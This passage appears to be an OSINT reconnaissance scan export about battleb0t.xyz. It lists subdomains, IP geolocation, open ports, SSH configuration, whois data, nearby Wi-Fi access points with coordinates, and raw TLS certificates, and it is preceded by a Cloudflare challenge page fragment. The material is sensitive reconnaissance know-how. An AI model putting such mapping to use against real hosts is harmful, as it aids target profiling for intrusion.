VgtqxZff2ZqlinhLXHPSVtkPU-H6FAHinPrzSf3uH_Q3H0UuvzybBwb61Kz9xfOtHBkP2nWMCU86xpSbO4c6VIi3roOnQLOncMey4LehldRzG60kvAcLOIIzsotkC6A0TzBdXW6h8WnOc98kvqVlyyluYDZoGL2sgBQP5iT8LeZ1GiKa6nuzXWAIZArCXDfvtsaNftRUiJODl-iLsalLmXB287qXlXnC-Sqn-VkYBIG1c0SYjAXzvc-MH1JJfTmtb7X2x-mXdkkqwoy16YRiEGxdDA84vt_3-1PJIVkwQFdJL01areTvrgmeIqm94L-DFciyanQyUBPitgHcxMUsm51YpB6KDWM18BLL4ehHRO7XO7TX_IIKdZiHbwQcPJ8FX04IKxS2S5Y3q_h8S65tynRA7TtY9YDIyDgHWfsgLSoL1L6GRBWm_cX_GqkdNtINyYbvrEjvcbcBhRdYEvzv7ySe_t5eEL9DPxXMRgGUTSk5GXudJNBbnpRMcYsT7qBIns8TOaWZIAFXnDbumx2Yzf2QUY6Xnq_tYLe1hwa_1BstafWXYwwQNC50mTlgJK1S5YWtg1SKoybbC9x5fcZ1N-_oCRgLtaxFqIZMUnOoV0u2hpdcXGPpNrOH3SR">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '70037',
cRay: '7c5f8c5a3bb81a1b',
cHash: '1cbb584e4678a4a',
cUPMDTk: "\/lol.html?__cf_chl_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei9sb2wuaHRtbA==',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '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',
t: 'MTY4Mzg2MTg2MS40NzgwMDA=',
m: 'l9x6fYD43AkOSli+eEX3TiMPXRiBndCq0G/Dpt1PKp4=',
i1: 'nuJed/J938+IZsnq9K0k2g==',
i2: 'LCpeQRd016F0btwfkm2M8w==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c5a3bb81a1b');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c5a3bb81a1b';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/lol.html?__cf_chl_rt_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| https://ayhu.xyz/lol.html?__cf_chl_f_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA |
| 2023-05-12 02:44:15 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3030::ac43:a8fc | fluid.battleb0t.xyz |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.116): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.191): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/jcqn.jpg | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:03:36 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00nave198.github.io |
| 2023-05-12 03:09:27 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | cdnjs.cloudflare.com | 188.114.97.1 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:00:0B:63:00:0B) | 41.8781, -87.6298 |
| 2023-05-12 02:54:07 | Physical Location | No | Censys | 1 | 0 | 2 | 0 | None | Rosemont, Illinois, 60018, United States, North America | 2606:4700:3031::ac43:8709 |
| 2023-05-12 03:00:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha1-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T01:15:51.449Z", "ip": "207.154.228.169", "labels": ["remote-access"], "location_updated_at": "2023-04-26T16:44:53.689109Z", "autonomous_system_updated_at": "2023-04-26T16:44:53.689174Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:33.692371432Z"}, "www.gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T18:54:15.274018983Z"}, "www.blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.495668467Z"}, "sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:58.102845672Z"}, "mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-09T22:38:36.279855979Z"}, "sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:34.142966985Z"}, "www.magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-25T04:27:35.542554385Z"}, "the.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:05.045794814Z"}, "git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-18T22:02:08.010914546Z"}, "why.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.763792122Z"}, "blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:41.064561319Z"}, "pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.203437608Z"}, "www.staging.pointlane.com": {"record_type": "A", 
"resolved_at": "2023-03-27T22:00:31.907335501Z"}, "www.mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.687219106Z"}, "www.polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.199285708Z"}, "www.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:33.577672224Z"}, "dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.141552446Z"}, "gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T10:53:09.803238695Z"}, "magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:18.482468579Z"}, "abs.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:22.221262680Z"}, "shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:40.132954471Z"}, "apk.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.628764632Z"}, "www.sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.479130613Z"}, "store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.021634906Z"}, "www.mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-02T14:44:59.299521244Z"}, "blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:12.270323061Z"}, "www.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:51.220733315Z"}, "gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:25.974047797Z"}, "getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:43.775790789Z"}, "www.test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.458677133Z"}, "www.sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:35.410578926Z"}, "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:49.792043016Z"}, "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", 
"resolved_at": "2023-03-26T21:45:11.528325040Z"}, "polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:11.409230997Z"}, "staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:15.055432105Z"}, "www.old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-18T22:01:33.780417520Z"}, "www.gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:09.056676609Z"}, "the.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:43.060825855Z"}, "mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.585095495Z"}, "old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:10.411213800Z"}, "www.shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.772740465Z"}, "posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.103803419Z"}, "www.git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:24.300688116Z"}, "app.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.045102600Z"}, "www.store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T16:00:25.103894275Z"}, "on.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.198972199Z"}, "www.blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:08.475610608Z"}, "www.dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-26T21:44:39.836624314Z"}, "crm.sirket.im": {"record_type": "A", "resolved_at": "2023-05-10T17:17:53.506957947Z"}, "javadfra.softether.net": {"record_type": "A", "resolved_at": "2023-05-09T20:04:58.925278232Z"}, "www.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.498526700Z"}, "tsxwdq.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-29T17:33:24.980088481Z"}, "wow.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-20T14:24:20.099465955Z"}, "test.pointlane.com": {"record_type": "A", 
"resolved_at": "2023-03-20T00:13:37.049342133Z"}, "what.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:49.646289405Z"}, "at.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-13T14:57:51.931938167Z"}, "polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.054213831Z"}, "in.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.386503067Z"}, "www.polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.836285670Z"}, "www.demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:02.797080934Z"}, "app.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.212849951Z"}}, "names": ["sitemap.posadisad.com", "the.pointlane.com", "shop.pointlane.com", "test.pointlane.com", "www.staging.pointlane.com", "www.blog.getsimnum.posadisad.com", "abs.posadisad.com", "getsimnum.posadisad.com", "in.pointlane.com", "posadisad.com", "magento.pointlane.com", "crm.sirket.im", "mail.pointlane.com", "www.mail.posadisad.com", "staging.pointlane.com", "sitemaps.posadisad.com", "pointlane.com", "www.sitemap.posadisad.com", "blog.getsimnum.posadisad.com", "www.demo.pointlane.com", "demo.pointlane.com", "what.pointlane.com", "www.store.pointlane.com", "www.old.pointlane.com", "www.mail.pointlane.com", "app.pointlane.com", "www.gitlab.pointlane.com", "app.posadisad.com", "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "blog.posadisad.com", "javadfra.softether.net", "at.pointlane.com", "mail.posadisad.com", "polygon.pointlane.com", "git.posadisad.com", "gitlab.posadisad.com", "old.pointlane.com", "wow.posadisad.com", "polygon.posadisad.com", "gitlab.pointlane.com", "apk.pointlane.com", "www.magento.pointlane.com", "www.polygon.pointlane.com", "dev.pointlane.com", "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "the.posadisad.com", "www.blog.posadisad.com", "store.pointlane.com", "www.dev.pointlane.com", "www.getsimnum.posadisad.com", 
"why.posadisad.com", "www.test.pointlane.com", "www.shop.pointlane.com", "on.pointlane.com", "www.polygon.posadisad.com", "tsxwdq.easypanel.host", "www.posadisad.com", "www.gitlab.posadisad.com", "www.git.posadisad.com", "www.sitemaps.posadisad.com", "www.pointlane.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.49", "extended_service_name": "SSH", "observed_at": "2023-05-11T01:15:50.786715445Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "547dbd625a27506b11586280f4a822637523e4a0ab006b506caadd882fb07151", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "8oJhdPmy3h9TMJvWg4Uf9bFwsyMd8Wzn2vYjEAGHvAA=", "x": "+yukgG2Uj68iboVSBhBnXM3KU5F0vU7GhjX/PobpTIQ=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", 
"rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sh |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:2095 | 104.21.6.166 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Cross-platform software | battleb0t.github.io |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom92EE90 (Net ID: 00:0C:F6:92:EE:90) | 50.8897, 6.0563 |
| 2023-05-12 03:16:31 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'HE', u'country_tld': u'.de', u'ip': u'207.154.228.169', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 82927922, u'country_code': u'DE', u'timezone': u'Europe/Berlin', u'city': u'Frankfurt am Main', u'network': u'207.154.224.0/20', u'languages': u'de', u'version': u'IPv4', u'latitude': 50.113381, u'in_eu': True, u'utc_offset': u'+0200', u'continent_code': u'EU', u'country_name': u'Germany', u'country_capital': u'Berlin', u'org': u'DIGITALOCEAN-ASN', u'postal': u'60311', u'asn': u'AS14061', u'country': u'DE', u'region': u'Hesse', u'longitude': 8.671931, u'country_calling_code': u'+49', u'country_area': 357021.0, u'country_code_iso3': u'DEU'} | 207.154.228.169 |
| 2023-05-12 03:09:54 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.108.133:443 | 185.199.108.0/24 |
| 2023-05-12 03:42:54 | Affiliate - Domain Whois | No | Whois | 0 | 0 | 6 | 0 | None | % Restricted rights.
%
% Terms and Conditions of Use
%
% The above data may only be used within the scope of technical or
% administrative necessities of Internet operation or to remedy legal
% problems.
% The use for other purposes, in particular for advertising, is not permitted.
%
% The DENIC whois service on port 43 doesn't disclose any information concerning
% the domain holder, general request and abuse contact.
% This information can be obtained through use of our web-based whois service
% available at the DENIC website:
% http://www.denic.de/en/domains/whois-service/web-whois.html
%
%
Domain: tjdev.de
Nserver: ns1.kramer-dns.de
Nserver: ns2.kramer-dns.de
Nserver: ns3.kramer-dns.de
Status: connect
Changed: 2023-02-25T19:39:25+01:00
| tjdev.de |
| 2023-05-12 02:45:57 | Physical Location | No | MetaDefender | 0 | 0 | 2 | 0 | None | San Francisco, United States | 172.67.135.9 |
| 2023-05-12 03:13:07 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00indahouse.github.io]
https://www.openphish.com/feed.txt | 00indahouse.github.io |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:8443 | 188.114.96.1 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MainSurf (Net ID: 00:02:2D:67:EF:5F) | 50.1188, 8.6843 |
| 2023-05-12 03:03:31 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 007-liang.github.io |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | eminent926 (Net ID: 00:14:5C:86:C4:D6) | 50.8897, 6.0563 |
| 2023-05-12 02:44:32 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:04:02:53:52:8b:ff:fb:8a:0a:11:44:e7:ab:f5:69:c5:9e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 14 17:33:43 2023 GMT
Not After : Apr 14 17:33:42 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:56:66:b3:c8:a2:23:b1:5a:3f:a8:f8:12:86:96:
e9:2c:15:d7:f2:10:34:11:7a:db:91:0d:f0:b3:57:
f5:24:8b:d6:33:b2:e0:da:47:1e:c3:4b:59:19:6f:
0a:27:ae:26:29:f9:b7:07:60:5c:49:2f:47:35:2a:
5c:c8:f0:96:d7
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3C:85:65:2A:BA:2A:04:2A:54:22:30:3E:E5:23:B1:1E:15:C3:96:05
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 14 18:33:43.335 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:F2:1C:95:AC:AF:08:7C:44:9A:42:32:
2C:2F:8A:04:A1:13:F3:46:FA:9D:26:CA:C9:98:C2:1D:
74:69:E4:86:1B:02:21:00:B6:39:78:67:7F:13:7F:74:
50:2A:AE:F8:F3:CD:06:25:FB:E7:4F:A7:FE:B7:C5:D8:
77:35:DE:26:00:5A:58:41
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Jan 14 18:33:43.326 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:98:54:50:30:B1:AC:EB:16:2E:CF:2C:
E2:5C:6F:49:73:2D:91:13:E2:7A:C0:23:16:9D:9E:E9:
34:9D:A8:4E:A2:02:21:00:E3:DA:6F:CF:C9:A3:6F:47:
24:1E:42:4E:CB:2C:6D:AC:F1:F2:5C:4B:15:0B:90:2E:
FE:19:52:BD:26:73:E2:1D
Signature Algorithm: sha256WithRSAEncryption
2f:9e:31:fd:c7:7d:47:cd:fd:01:35:76:75:af:bd:65:15:84:
23:f2:b5:a5:8c:aa:3b:d4:46:ab:0f:e0:6d:fb:3d:ad:16:bd:
71:fe:51:be:c7:6a:78:ea:91:90:3b:63:30:ca:95:ff:ee:9d:
47:eb:f2:5f:85:42:d9:44:d3:72:73:10:be:c7:a2:44:25:dc:
30:6d:25:07:16:5b:55:37:2d:53:15:d4:54:6f:02:56:82:ca:
95:f2:b0:da:05:fe:09:30:21:c9:bf:23:af:eb:66:9c:3c:46:
c8:ed:d9:23:0c:31:c4:20:44:6b:a8:53:fc:12:a1:6a:08:26:
66:47:c9:ad:7e:d3:29:01:28:72:f6:e7:00:31:5c:a0:b4:5c:
64:09:26:8a:da:16:e9:1a:8b:b1:d1:3c:b2:df:e5:77:f4:c3:
a8:4f:d0:1f:26:99:a7:10:8e:7f:65:a5:5e:cc:0b:70:42:ad:
cf:7c:e0:c3:b5:7f:91:07:d9:1f:ba:ef:57:c4:d1:91:9e:a3:
40:93:8d:12:a1:08:bc:b5:cb:35:70:ad:45:f9:4b:fb:c8:74:
0b:37:9e:08:b9:59:0e:0e:55:98:c2:7b:c5:55:28:93:52:3c:
ca:41:c2:5e:52:c3:32:1b:c4:d5:a9:18:45:1e:58:3a:fc:ed:
c0:69:88:aa
| battleb0t.xyz |
| 2023-05-12 02:57:22 | Internet Name | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | vscode.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.44): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 104.21.71.14 | oldfluid.battleb0t.xyz |
| 2023-05-12 02:46:54 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:3a:9d:01:de:8f:db:a2:52:4a:02:0c:18:70:da:44:dd:bc
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 13 12:50:47 2023 GMT
Not After : Jun 11 12:50:46 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:86:d1:c6:73:d4:68:16:b7:b8:27:02:2e:0a:
3b:ac:b2:c0:cf:5d:bb:e0:97:62:4b:2d:4c:a7:8a:
0f:bb:28:62:25:f7:8b:c2:a2:9f:9f:a4:09:ae:64:
46:ad:01:04:9a:1c:e2:d3:da:ff:2f:0b:66:3e:17:
93:38:08:7c:21:35:76:62:9b:3d:79:67:17:13:fe:
36:e3:cb:d3:f1:13:27:de:39:d4:be:26:b9:a7:bc:
48:6c:32:02:59:5e:42:77:18:cd:f0:52:6e:ff:59:
03:7e:1d:11:be:bc:ab:d2:7f:d2:95:33:32:9e:74:
fe:3f:8c:4e:e3:30:bd:bb:06:89:38:c8:e8:4f:53:
3b:f6:63:c0:62:08:06:0e:e7:94:7f:f0:60:db:70:
ea:7f:78:d5:b9:6c:e0:49:a6:b4:37:75:b0:52:59:
b3:35:96:ab:99:46:f4:69:22:fd:0c:96:69:7a:42:
ab:47:42:08:6b:5e:8a:9a:4d:97:23:10:94:f7:79:
b4:c3:5e:97:52:71:2a:e0:cb:16:4d:05:9d:0a:4b:
32:05:28:18:33:7b:d6:34:6c:b7:3e:5b:ab:cb:54:
41:54:0f:0b:fa:c3:ea:b8:4b:80:0a:8e:f0:90:cd:
32:45:6e:24:6b:2b:da:60:08:2e:69:e6:59:89:a4:
25:87:82:03:c6:3c:bd:7c:46:55:91:56:df:8c:10:
3f:c4:bc:32:26:aa:2e:b1:d8:86:87:bf:32:be:e7:
49:d8:74:e0:99:42:34:64:c2:23:25:06:06:47:62:
f1:32:ce:42:2e:0b:a1:5c:5c:7d:55:6f:f5:43:b6:
4a:13:84:0e:20:9b:ad:e4:75:cf:98:ec:28:ca:d5:
97:e8:15:83:85:e3:c5:d8:e3:28:87:31:07:5e:2c:
11:d9:8a:d6:52:d3:ed:87:7d:ab:aa:dd:63:d0:48:
bb:c8:d0:2e:7e:92:84:13:37:53:61:b8:ec:ac:9a:
86:7b:ce:3f:d2:40:f0:db:6c:2c:1e:97:3b:c5:cb:
35:b4:86:6e:2c:94:d1:aa:dc:d2:87:31:ab:38:c5:
f4:27:1d:0a:25:44:99:80:36:03:ce:91:80:1c:d1:
59:d4:7c:5a:37:1b:0a:ce:f5:f1:c0:65:43:fc:ee:
ed:8e:bc:b1:d6:9d:85:ca:8e:38:b3:e3:c0:7f:97:
a5:98:eb:15:ff:cd:24:e7:6d:15:4d:57:89:17:a7:
5f:b4:d5:d3:b7:8f:07:9c:a8:ea:76:1e:e7:f3:2c:
9b:59:ae:2b:2b:2c:ad:9d:e2:f1:8d:94:c2:23:8f:
a7:4d:67:84:e7:2f:fb:e0:0a:d2:eb:7c:d9:ee:92:
a6:63:7b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
20:59:35:73:F8:CD:0E:84:44:DD:6F:B0:C2:B9:45:18:98:00:40:7B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
3a:9c:49:d5:78:f8:ac:5a:ba:61:60:6a:4f:18:04:e8:71:47:
69:62:76:f2:cc:e1:7a:77:c4:76:2d:14:ad:8a:51:f0:c8:e8:
f9:38:53:48:90:b9:69:2e:c4:f1:18:37:86:86:25:90:2d:e5:
dd:87:c3:e4:30:76:38:c5:2d:b9:29:35:8f:95:4f:0a:47:25:
94:fe:7d:19:c2:82:cf:f4:d6:6f:2b:05:f9:ef:21:99:a0:d9:
36:83:ad:ba:2a:71:8c:ce:04:55:e9:a3:ae:0f:98:dd:33:3e:
